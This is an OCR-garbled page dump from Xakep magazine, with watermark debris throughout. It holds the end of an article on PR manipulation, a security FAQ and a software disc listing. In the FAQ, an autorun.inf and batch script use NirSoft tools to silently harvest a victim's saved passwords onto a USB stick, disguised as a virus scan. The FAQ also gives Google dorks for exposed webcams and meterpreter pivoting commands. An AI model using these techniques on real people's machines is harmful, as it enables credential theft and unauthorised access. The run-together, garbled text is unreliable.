Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
Скачиваний:
12
Добавлен:
20.04.2024
Размер:
16.32 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

PR — связисобщественностью

Запусквоздушныхшаров— неизменныйатрибуткрупнойPR-акции илирекламнойкампании

эту категорию потенциальных избирателей конкурента, PR-щики на уровне подсознания сравнивают кандидата со злым началом. Подробнее об архетипах можно узнать из работ Карла Юнга.

Несколько примеров из жизни

Приведу несколько наиболее удачных примеров манипуляции массовым сознанием, чтобы проиллюстрировать, как это все работает.

Пример первый. Многие помнят «Оранжевую революцию» 2004 года в Киеве. Народ вышел на митинг. Против толпы брошены войска со щитами, дубинками и оружием.

И что увидели солдаты, прибывшие на «поле боя»? Их встречали не разъяренные мужики с палками, а старенькие бабушки с цветочками (сразу возникает ассоциация с пожилой матерью или бабушкой). Каково поднять дубинку на родную мать? Или на маленького улыбающегося ребенка, протягивающего тебе ручонку с апельсинкой? Организаторы акции хорошо знали, что солдаты — это, в первую очередь, люди. И

вэкстремальных ситуациях подсознание берет верх над приказом свыше. Кто был

вэто время на площади Независимости, помнит, какая атмосфера любви и добра там царила. Армия против таких эмоций бессильна.

XÀÊÅÐ 05 /136/ 10

Еще один важный момент: если бы солдаты все же подняли руку на беззащитных неагрессивных людей, не дававших повода для расправы, вмешались бы международные организации, наблюдавшие за происходящим. Проигрыш «синей» стороны был бы гарантирован еще сильнее.

Второйпример. Впрошедшихвыборахна УкраинеосновнымилидерамибылиЮлияТимошенкоиВикторЯнукович. Передсамыми выборами, внекоторыхпечатныхиинтернетСМИпрокатилисьновостиотом, чтоЮ. Тимошенкособираетсяперекрытьдоступксо-

циальнымсетямodnoklassniki.ru иvkontakte. ru. Аэтонаиболеепосещаемыеилюбимые средибольшинстваресурсынатерритории бывшегоСНГ. Документальнойвидеозаписи этихсловпредставленонебыло, былитолько статьи, причембезцитат. Итутжебылиприведеныдословныефразылюдейизкоманды В. Януковичаотом, чтоонипостараютсяво чтобытонисталонедопуститьзакрытия ресурсов. Проверитьэтуинформациюневозможно, даиеслилогическиподумать, то, во-первых, этонарушениезаконаосвободе доступакинформации, во-вторых, прокси

иVPN ещениктонеотменял. Нолюдивэто поверили, началасьпаника. Примерхорошо демонстрируетприемы, описанныевыше:

«ложныйнакалстрастей», «образврага», «ударнаопережение», «экспрессивный удар», «искусственноепросчитываниеситуации», «повторение». Порезультатампредварительныхопросовпослеэтой«новости» рейтингЮлииТимошенкоупал.

Заключение, или как не поддаваться манипуляциям со стороны

СМИ и PR-щиков

Еслимысреднестатистическиеграждане, живемвсоциумеиавтоматическивоспринимаемвсе, чтонамподают, неподдаваться манипуляциямтяжело. Новозможно. Для этогодостаточно:

знатьосновныеприемывоздействия(прочитавстатью, тыужеимеешьонихпредставление);

уметьвыделитьихвмассеинформации, льющейсянанасизСМИ, рекламныхплакатов, слуховвинтернете(имеяперечень приемов— ищи, соотноси, тренируйся);

понимать, чтоеслиэтоесть, значит, кому-то этовыгодно(иначе, ктобудетспонсироватьту жепрессу);

неприниматьпоспешныхрешений, особенноеслиналицонедостатокинформации, или онанепроверена;

старатьсяиметьсвоеличноемнениепо любомузначимомудлятебявопросу;

и, конечноже— думать, анализироватьи большедоверятьсебе.

Осваивай, тренируйсяинезабывай, чтоопытныеманипуляторы— такиежелюди, просто оничащечитаютрубрикуPSYCHO! :)z

139

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

UNITS

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

o

m

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

 

 

 

p

 

 

 

 

gАнтон Жуков antitster@gmail.com

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

faq

united@real.xakep.ru

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Q: Мнекажется, всемоипаролиувели. Причем кто-тоиззнакомых, ктоимелдоступккомпьютеру. Какэтомогловыйти?

A: Всезависитотфантазиизлодея. Для осуществленияегоковарныхзамыслов вполнемоглабытьзаготовленаспециальная флешка, спомощьюкоторойможнонезаметновытащитьоченьмногополезнойинфы. Скажем, многиепользователи, даиавтор этойстатьинапример, позволяетбраузеруи другимпрограммамсохранятьпароли. Вотих ипрощевсегоувестиспомощьюнехитрого наборасофта:

MessenPass (www.nirsoft.net/utils/mspass. html) — восстанавливаетпароликбольшинствупопулярныхпрограммдляобмена мгновеннымисообщениями: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ, Trillian, Miranda иGAIM;

Mail PassView (www.nirsoft.net/utils/mailpv. html) — извлекаетсохраненныепаролииз почтовыхклиентов: Outlook Express, Microsoft Outlook 2000, Microsoft Outlook 2002/2003, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird;

IE Passview (www.nirsoft.net/utils/internet_ explorer_password.html) — выдергивает логиныипароли, сохраненныеInternet Explorer-ом;

Protected Storage PassView (www.nirsoft.net/ utils/pspv.html) — восстанавливаетвсепароли, сохраненныевзащищенномхранилище;

PasswordFox (www.nirsoft.net/utils/

passwordfox.html) — получаетвсепароли, сохраненныеFirefox'ом.

Ничегонестоит, заранеесохранивбинарники нафлешке, потомзапускатьихвавтозапуске. Создаемautorun.inf соследующимсодержанием:

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

Азатемlaunch.bat:

start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

Послеэтогозлоумышленникуостаетсятолько подключитьфлешкуивпоявившемсяpopup-

окневыбрать"ACTION= Perform a Virus Scan",

чтобыобзавестисьбольшимколичеством паролей, которыесохранятсявтекстовых файлах.

Q: Какнайтивеб-камеры, доступккоторым открытпрямоизинета?

A: Вспоминаемстатьипоповоду«Googlehack

длямаленьких!» (www.xakep.ru/magazine/ xa/076/056/1.asp) иберемнавооружение несколькополезныхзапросов:

inurl:"CgiStart?page="

inurl:/view.shtml intitle:"Live View / — AXIS inurl:view/view.shtml inurl:ViewerFrame?Mode= inurl:ViewerFrame?Mode=Refresh inurl:axis-cgi/jpg

inurl:axis-cgi/mjpg (motion-JPEG)

140

XÀÊÅÐ 05 /136/ 10

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

(disconnected)

inurl:view/indexFrame.shtml

inurl:view/index.shtml

inurl:view/view.shtml liveapplet

intitle:"live view" intitle:axis intitle:liveapplet allintitle:"Network Camera NetworkCamera" (disconnected) intitle:axis intitle:"video server"

intitle:liveapplet inurl:LvAppl intitle:"EvoCam" inurl:"webcam. html"

intitle:"Live NetSnap Cam-Server feed"

intitle:"Live View / — AXIS" inurl:indexFrame.shtml Axis inurl:"MultiCameraFrame?Mode=Motio n" (disconnected)

intitle:start inurl:cgistart intitle:"sony network camera site:.viewnetcam.com -www. viewnetcam.com

intitle:"Toshiba Network Camera" user login

intitle:"netcam live image" (disconnected) intitle:"i-Catcher Console — Web Monitor"

Q: КакудалитьизОСдрайверынеиспользуемыхустройств?

A: Подключивдажеодинразбеспроводную мышку, чужуюфлешкуилилюбойдругой девайс, мывынуждаемОСустанавливатьдля нихдрайвер, которыйостаетсядажевтом случае, еслисамиустройствабольшеникогда неиспользуются. Такимобразом, всистеме появляются«устройства-призраки» , чтов своюочередьприводитктому, чтоОСначинает долгозагружаться. Крайнежелательнохотя быиногдачиститьОСотдрайверовтаких неиспользуемыхустройств, счемотлично справляетсяутилитаGhostBuster (ghostbuster. codeplex.com). Главное— неудалитьлишнего!

Q: Столкнулсястакойпроблемой. Выполняю пентесткорпоративнойсети, разделенной файрволомнадвечасти(режетвсекроме HTTP/HTTPS-трафика). Ужеполучилдоступкмашинеизпервойполовинысети (172.16.186.132). Сэтоймашиныполучилдо- ступчерезmeterpreter-сессиюкоднойизма- шинизвторойполовинысети(172.16.186.126) (та, чтозафайрволом). Можноликак-тозаста- витьNessus просканироватьвторуюполовину сетичерезmeterpreter-сессию?

A: Да, такаяпроблемадовольночастовозникаеткаквходевзлома, такиприпроведениипентестинга. Схемадействийтакова(в описанииусловимся, чтомашинаизпервой половинысети— атакующая, извторой— жертва):

1.СначаланеобходимочерезmeterpreterсессиюустановитьOpenSSH намашинужертву. Задачанеобычная, новесьпроцесс оченьхорошоописанвстатье: packetheader. blogspot.com/2009/01/installing-openssh-on- windows-via.html.

2.ПослеустановкиOpenSSH исоздания учетнойзаписинужнонастроитьMeterpreter, чтобывесьвходящийтрафикна8000 порт атакующеймашиныфорвардилсяна22 порт жертвы:

meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22

3. ПускаемSSH-соединениечерезатакующую машину(172.16.186.132):

# ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132

ДаннаякомандаподнимаетSOCKS4-прокси на9000 порту, которыйфорвардитвесьтрафик дожертвычерезSSH-сессию.

4.ИспользуемPROXYCHAINS длятого, чтобы пуститьтрафикnessusd черезSOCKS4-прок- си, висящемна9000 порту(дляэтогонеобходимовнестинебольшиеизменениявфайл конфигурацииproxychains.conf — вчастности поменятьпорт, указанныйвпоследнейстроке файла):

#proxychains /usr/sbin/nessusd -D

5.ЗапускаемNessus-клиентиможемскани- роватьсеть.

Q: Впоследнеевремясталзамечать, что Wireshark прибольшомпотокепакетовначинаетсильноподвисать. Естьликакой-тоспособ исправитьэто?

A: Проблемавтом, чтоWireshark-унеобхо- димоодновременноперехватыватьпакеты, разбиратьихначастииобновлятьокнос информацией. Прианализебольшогопотока пакетовслабаямашинабанальнонесправляется. Выходесть— консольнаяверсия Wireshark Tshark. Тулзапоставляетсявместес основнойпрограммойиимеетвнушительный списокопцийдлязапуска(справкавыдается покомандеtshark -h).

Какэтоиспользовать? Дляначалаработы нужноспервавыбратьсетевойинтерфейсдля прослушивания. Списокдоступныхинтерфейсовзапрашиваетсякомандойtshark

-D. Выводбудетпредставлятьсобойнечто подобное:

1.\Device\NPF_{11A468B6-C065- 45F6-AB32-D69695A6F601} (MS Tunnel Interface Driver)

2.\Device\NPF_{A16900A3-020C- 4B05-B430-4CD67527C189} (Realtek

RTL8168B/8111B PCI-E Gigabit

Ethernet NIC)

Дляперехвататрафикасовторогоинтерфейсадостаточноввестивконсоли:

tshark -i 2 -wexample.pcap -f "tcp[13] = 0x14",

где

-i — указываеткакойинтерфейспрослушивать;

-w — задает, вкакойфайлсохранятьперехваченныепакеты;

-f — определяетфильтрпакетов, использующийсинтаксисlibpcap (вданномслучае, сохраняемtcp пакетыс13-ымбитомвзаго- ловкеравным0x14, тоестьпакетысустановленнымифлагамиRST иACK). Подробнее просинтаксисможноузнатьвмануалеwww. cs.ucr.edu/~marios/ethereal-tcpdump.pdf ина сайтеwww.tcpdump.org/tcpdump_man.html.

Длятогочтобызакончитьзахватпакетов, до- статочнонажать<Ctrl-C>. Полученныйфайл example.pcap можнозагрузитьвWireshark и

спокойно, безвсякихтормозов, анализировать.

Q:Скажи, какможносравнитьдвеверсии однойитойжединамическойбиблиотекиили бинарника, чтобыпосмотреть, какиефункции изменилисьичтоименновнихизменилось?

A:Длятогочтобысравнить, чтоизменилосьв приложении, можноиспользоватьследующие плагиныдляIDA:

BinfDiff (www.zynamics.com/bindiff.html)

TurboDiff (corelabs.coresecurity.com/index.p hp?module=Wiki&action=view&type=tool&nam e=turbodiff)

Схемаработыпроста: дизассемблируемпервуюбиблиотеку, затемвторую. Послеэтогооткрываемпервыйдиззасемблинг(*.idb файл),

заходимвEdit ÆPlugins ÆTurbodiff/Bindiff и

выбираемопцию«compare with», послечего указываемфайлсдиззасмеблингомвторого файла. Врезультатепрограммавыдастподробныйотчетотом, какиебылипроизведены изменениявисполняемыхфайлах.

Q:КовыряюскриптынаналичиеXSS/CSRFбагов, нехватаетхорошегосредствадля отслеживанияJavaScript-событий. Подскажи, чемлучшепользоваться?

A:Скрипты, отладка, XSS, Javascript — для всегоэтогохорошоподходитсвязкаFirefox

+Firebug + Eventbug. Еслиопервыхдвух знаютпрактическивсе, тоEventbug, которыйпоявилсясовсемнедавно, многиепо незнаниюобходятстороной. Забавно, чтоэто плагиндляFirebug'а, которыйсампосебеуже являетсяплагином(апотомумыудивляемся, чтоFirefox сталпочему-тотормозить:)). А предоставляетонкакразто, чтотебенужно: позволяетпросматриватьвсеобработчики событийнастранице. Послеегоустановкив Firebug появляетсядополнительнаявкладка «Events». Теперьдлятого, чтобыпосмотреть

XÀÊÅÐ 05 /136/ 10

141

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

o

 

 

 

w

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

UNITS

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

обработчикикакого-либоэлемента, достаточновыделитьего, ивсеобработчикисразу отобразятсянапанели. ДляработыEventbug

требуетFirefox 3.6 иFirebug 1.5 иливыше. Сам

Eventbug находитсявстадииактивнойдора- боткиипокадоступнатолькобета-версия, которуюможновзятьздесь— getfirebug.com/ releases/eventbug/1.5/eventbug-0.1b4.xpi.

Q: Известно, чтомногиепользователиLinux используютутилитуtraceroute дляисследования сети. Можнолиеекак-тообмануть?

A: Нетничегоневозможного:). Специально дляэтогобыласозданапрограммкаFakeroute (www.thoughtcrime.org/software/fakeroute).

Онапозволяетзадатьподдельныймаршрут, которыйбудетдобавленкреальному. Скажем, реальныймаршрутвыглядиттак:

traceroute to yyyy (63.199.yy.yyy), 30 hops max, 38 byte packets

1 xx.xxx.com (172.17.8.1) 0.867 ms

0.713 ms 0.601 ms

2adsl-64.dsl.snfc21.pacbell.net (64.165.xxx.xxx) 2.065 ms 1.895 ms 1.777 ms

3yyyy.com (63.199.yy.yyyy) 28.585 ms 26.445 ms 25.489 ms

Атеперьчутьпоиграемснимспомощью

Fakeroute'а:

traceroute to yyyy (63.199.yy.yyy), 30 hops max, 38 byte packets

1 xx.xxx.com (172.17.8.1) 0.867 ms

0.713 ms 0.601 ms

2adsl-64.dsl.snfc21.pacbell.net (64.165.xxx.xxx) 2.065 ms 1.895 ms 1.777 ms

3wh243.eop.gov (198.137.241.43) 0.442 ms 0.553 ms 0.42 ms

4foundation.hq.nasa.gov (198.116.142.34) 0.442 ms 0.542 ms 0.422 ms

5yyyy.com (63.199.yy.yyyy) 28.585 ms 26.445 ms 25.489 ms

Несложнозаметить, чтонапутиследования магическимобразомпоявилосьнесколько любопытныхузлов:).

Q: Какимобразомможнозарабатыватьденьги наинформационнойбезопасности, кромекак проводитьнепосредственнопентесты? Естественно, легально.

A: На самом деле, как и в любой другой нише, возможностей здесь миллион. Если не брать в расчет разработку и продажу специализированного софта, выполняющего те или иные проверки, то можно привести в пример несколько успешных веб-сервисов. Взять хотя бы продажу VPN, когда бизнесменам и

политикам, требовательным к безопасности, необходимо работать исключительно через защищенное соединение. Увы, те абузоустойчивые VPN, которые продаются хакерам для анонимности, не вполне легальны, потому что владельцы и хостинг намеренно игнорируют жалобы и обращения компетентных органов. Другой пример — сервис по взлому WPA-ключа с помощью облачных вычислений WPA Cracker (www.wpacracker. com). Ребята подняли кластер из 400 процессоров, нагенерировали огромное количество радужных таблиц (для 135 миллионов паролей), а теперь предоставляют доступ к этому хозяйству за небольшую денежку. В результате, любой желающий за 17$ может попробовать взломать ключ WPA или пароль к ZIP-архиву. На перебор по таблицам уйдет не более 20 минут, в то время как у обычного двухяредрного компьютера на ту же задачу ушло бы 5 дней. Сервис из сегод-

няшнего WWW2 — SHODAN (www.shodanhq. com), позволяет по заданным параметрам найти серверы (например, работающие на версии Apache). Общая часть функционала бесплатна, но если хочешь экспортировать результаты в удобном XML формате, изволь заплатить денежку. Короче говоря, возможность сделать абсолютно легальный сервис, который напрямую касается ИБ и приносит деньги — более чем реально.

Q:Гдебыраздобытьсвежихобразцовмалвари дляанализа? :)

A:Прощевсего, зайтинаwww. malwaredomainlist.com иwww.malwareurl. com искачатьсвежуюбазудоменов, откуда производитсязагрузкатроевидругоймалвари. Дальшевсепросто: запускаемвиртуальнуюмашину, открываемвстаромнепатченном браузереодинсайтзадругими, анализируя изменениявфайловойсистемеиреестре (утилитамиRegMon/FileMon), иудивляемся, наскольколегкоможноподцепитьтроя, простосерфяинет.

Q:НужнобыстрогенерироватьNTLM-хеш, как этосделать?

A:ВоттебепримернаPython'е, иэто, пожалуй, наиболеепростойспособ:

import hashlib,binascii hash = hashlib.new('md4',

"thisismyhashvalue".encode('utf16le')).digest()

print binascii.hexlify(hash)

Q: Устроилсянаподработкуадминомводну небольшуюкомпанию(30 компьютеровв локалке, несколькосерверов). Пользователи умудряютсямоментальнозасоритьместона HDD, из-зачегоначинаетглючитьвнутренний

софт, написанныйнесамымлучшимпрограммистом. Какбыцентрализованопроверить наличиесвободногоместанакаждомиз компьютеров?

A: ЯбысделалэтоспомощьюPowerShell'а,

используяфункциюGet-WMIObject Win32_ LogicalDisk. Предположим, списоккомпьютеровхранитсяунасвфайлеc:\hostlist.txt, тогда длявыводаинформацииосвободномместе накаждомизхостовможнополучитьодной единственнойкомандой:

Get-WMIObject Win32_LogicalDisk -filter “DriveType=3?

-computer (Get-Content c:\ hostlist.txt) | Select SystemName,DeviceID,VolumeName,@ {Name=”size(GB)”;Expression={“{0 :N1}” -f($_.size/1gb)}},@{Name=” freespace(GB)”;Expression={“{0: N1}” -f($_.freespace/1gb)}} | OutGridView

Надозаметить, чтобольшаячастькодазанимаетсявыводомифильтрациейрезультата.

Q:КакимобразомможнонаиболеебезболезненномигрироватьсMySQL наSQL Server?

A:С такой ситуацией недавно столкнулся лично, когда начальство попросило осуществить подобный переход. Сложность

заключается в том, что в MySQL многие вещи отличаются от SQL Server. Для того чтобы не заморачиваться со многими нюансами вручную, можно автоматизировать процесс — для этого специально создана утилита Microsoft Sql Server Migration Assistant for MySQL (bit. ly/8peZcm).

Q:Хочу посмотреть фильм на своем аппаратном HD-проигрывателе. К проигрываемому видеофайлу нельзя подключить внешнюю звуковую дорожку (хочу посмотреть фильм в оригинале), поэтому приходится заранее это делать на компьютере. Пользуются сложным видеоредактром: муторно и сложно. Подскажи какой-нибудь простой способ.

A:БесплатнаяпрограммаAVI-Mux GUI (www. alexander-noe.com/video/amg) — то, чтодок-

торпрописал. Процессвэтомслучаепроще простого:

• выбираешьвидеофайл;

• извлекаешьинформациюодоступныхау-

диодорожках(кнопка«generate data source»);

• далеедобавляешьвпрограмму(можнопрямоDrag'n'Drop'ом) файлысдругимизвуковымидорожками;

• нажимаешьStart, чтобычерезнекоторое времяполучитьготовыйфайл.

Спомощьюэтойжепрограммыможносклеить инескольковидеофайловводин. z

142

XÀÊÅÐ 05 /136/ 10

>>WINDOWS

>>Development

ILMerge

JRE 6u19

Microsoft Application Verifier 4.0

Rad Software Regular Expression

Designer v1.4

SciTE 2.10

SQLite Expert Personal 2.4.12

SQLyog 8.32

Sublime Text 1.3

TreeSize Free 2.4

UltraEdit 16.00

Visual Paradigm for UML 7.2 Community Edition

>Games

Cheat Engine 5.6

Construct 0.99.62

Hedgewars 0.9.13

Souptoys 1.6.0.8

Engine Development Kit 1.9.1

>Misc

7 Taskbar Thumbnail Customizer

Agent Ransack 2010

Ant Renamer 2.10.0

BatteryCare 0.9.7.10

CodySafe

Desk Drive 1.8.2

Duplicate Music Files Finder 1.6

ExQueues Shell Queue 0.3.10

Keys Extender r12

Launchy 2.5

LogViewer Pro 1.8.0

Moo0 RightClicker 1.38

TreeSize Free 2.4

Ultimate Windows Tweaker 2.1

UNetbootin 4.29

winPenPack Flash Essential 3.6

>Multimedia

AIMP 2.61.560

Camtasia Studio 7.0.0

CDBurnerXP 4.3.0

Faceworx 1.0

Fotosketcher 1.96

Foxit Reader 3.2.1

LEGO Digital Designer 3.0.11

MetatOGGer 3.12

Miro 3.0

SeeMonkey Demo

Tableau Public 5.1

Teemoon Video Matching 1.0.5

Wondershare PPT2Video Free

YoWindow 2.0

>Net

AnalogX LinkExaminer 1.01

Feed Notifier 2.2

Gbridge 2.0

Http File Server 2.2f

mRemote 1.63

PrimeDesktop Beta 1.0

SmartCode VNC Manager 5.5

StrongDC++ 2.41

TeamViewer 5.0.8

TightVNC 2.0 Beta 1

WinDump 3.9.5

WinPcap 4.1.1

>Security

CHScanner 0.9.8.1

Digital Forensics Framework 0.5.0

Eraser 6.0.6

FSF 0.7.3.9

Kon-Boot 1.1

Nmap 5.30BETA1

OWASP CSRFTester 1.0

PenTBox 1.3.2

Plecost 0.2.2-8

Scalp 0.4

SIP Inspector 1.0

StreamArmor v1

Toolza 1.0

VASTO beta

w3af 1.0rc3

WebCastellum 1.8.3

WebRaider 0.2.3.8

Websecurify 0.5

XSSer 0.4

>System

Auslogics Disk Defrag 3.1.4

Comodo Time Machine 2.6.1

DLL Archive 1.01

Double Driver 3.0

Driver Magician Lite 3.49

ImDisk Virtual Disk Driver 1.2.8

Open Hardware Monitor 0.1.28

Parted Magic 4.9

PortMapper 1.04

Process Explorer 12.01

Software Informer 1.0.5

VirtualBox 3.1.6

ZeuApp 1.4

>>UNIX

>Desktop

Amarok 2.3

Nairo-compmgr 0.3.0

Clementine 0.2

DirSync Pro 1.24

Exaile 0.3.1

FBReader 0.12.9

Gaupol 0.15.1

gLabels 2.2.7

Gnumeric 1.10

KMPlayer 0.11.2

mhWaveEdit 1.4.18

OGMRip 0.13.4

Openbox 3.4.11.1

OpenShot 1.1

Pinta 0.2

RecordStream 0.9.2

Scribus 1.3.6

Simple Movie Catalog 1.3.0

Smb4k 0.10.6

TeXmacs 1.0.7.4

VK_search 0.1.0

>Devel

Android NDK r3

BPython 0.9.6.2

C++ Sockets Library 2.3.9.2

GDB 7.1

GSQL 0.2.2

GTK+ 2.20.0

libimobiledevice 1.0.0

libpng 1.4.1

libtorrent 0.14.9

nwcc 0.8.1

Octave 3.2.4

Parrot 2.2.0

PyInstaller 1.4

PyPy 1.2

Python 2.6.5

Redcar 0.3.4dev

SolarPHP 1.0

Squeak 4.0

Titanium 1.0

ZeroC ICE 3.4

>Games

SuperTux 0.3.3

>Net

0MQ 2.0.6

Darkstat 3.0.713

EisKaltDC++ 2.0

elFinder 1.1

Google Chrome 5.0.342.7 Beta

Instantbird 0.1.3

Khal 0.0.1

Miro 3.0.0

Mozilla Firefox 3.6.2

Mpop 1.0.20

Opera 10.51

pyAggr3g470r

Rekonq 0.4.0

Retroshare 0.5.0

Rspamd 0.2.9

rTorrent 0.8.6

Rutorrent 3.0

Sharktorrent 0.2.0.4

Twitim 1.4.2

Uget 1.5.0.3

>Security

ClamAV 0.95.3

Dnswall 0.1.4

Dradis 2.5.1

Dsniff 2.3

Flint

HnTool

Lshell 0.9.10

Ncrack 0.01a

OpenSSL 1.0.0

Passwdqc 1.2.1

Pyscanlogd 0.5

Ratproxy 1.58

Skipfish 1.26b

Sqlmap 0.8

Stunnel 4.32

Surfjack 0.2b

Ubitack

VMvicnum 14

Webpentools 0.1

Yummy

>Server

Apache 2.2.15

BIND 9.7.0

CUPS 1.4.2

DHCP 4.1.1

Freeradius 2.1.8

Lighttpd 1.4.26

Monkeyd 0.9.3

MySQL 5.1.45

NFS-Ganesha 0.99.63

OpenLDAP 2.4.21

OpenSSH 5.4

OpenVPN 2.1.1

Postfix 2.7.0

PowerDNS 3.2

Pure-ftpd 1.0.29

RabbIT 4.5

Samba 3.5

Squid 3.0.STABLE25

Tnftpd 20100324

Vsftpd 2.2.2

>System

Ailurus 10.03.2

ATI Catalyst 10.3

Fio 1.38

Grep 2.6

Install Kernel 0.9.4

Linux From Scratch 6.6

Linux Kernel 2.6.33.1

Mdadm 2.6.9

Mirmon 2.3

NTFS-3G 2010.3.6

nVidia 195.36.15

Synchrorep 1.4.5

Tar 1.23

VirtualBox 3.1.6

Wine 1.1.41

XNeur+gXNeur 0.9.8

Yum 3.2.27

>X-distr

